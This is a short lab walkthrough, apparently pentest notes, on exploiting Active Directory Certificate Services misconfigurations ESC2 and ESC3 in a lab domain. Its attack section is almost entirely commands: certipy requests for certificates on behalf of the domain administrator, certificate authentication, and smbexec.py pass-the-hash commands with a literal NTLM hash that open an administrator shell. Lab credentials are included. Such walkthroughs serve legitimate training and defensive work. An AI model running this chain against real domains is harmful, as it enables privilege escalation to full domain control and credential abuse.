ADCS - ESC2 & ESC3
in order to abuse this misconfiguration, the following conditions must be met:
The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
Manager approval is disabled. Details are the same as in ESC1.
No authorized signatures are required. Details are the same as in ESC1.
An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
The certificate template defines Any Purpose EKUs or no EKU.
Query cert
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA

Query cert with the Certificate Request Agent certificate we get before (-pfx)
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx

Auth
sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Get Shell or POWERSHELL :)
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell
We also can do the same with the ESC3-CRA and ESC3 templates in the lab :
Enrollment Agent Templates — ESC3
In order to abuse this misconfiguration, the following conditions must be met:
The Enterprise CA grants low-privileged users enrollment rights. Details are the same as in ESC1.
Manager approval is disabled. Details are the same as in ESC1.
No authorized signatures are required. Details are the same as in ESC1.
An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users. Details are the same as in ESC1.
The certificate template defines the Certificate Request Agent EKU. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
Enrollment agent restrictions are not implemented on the CA.
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.Pereida.pfx
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12
Last updated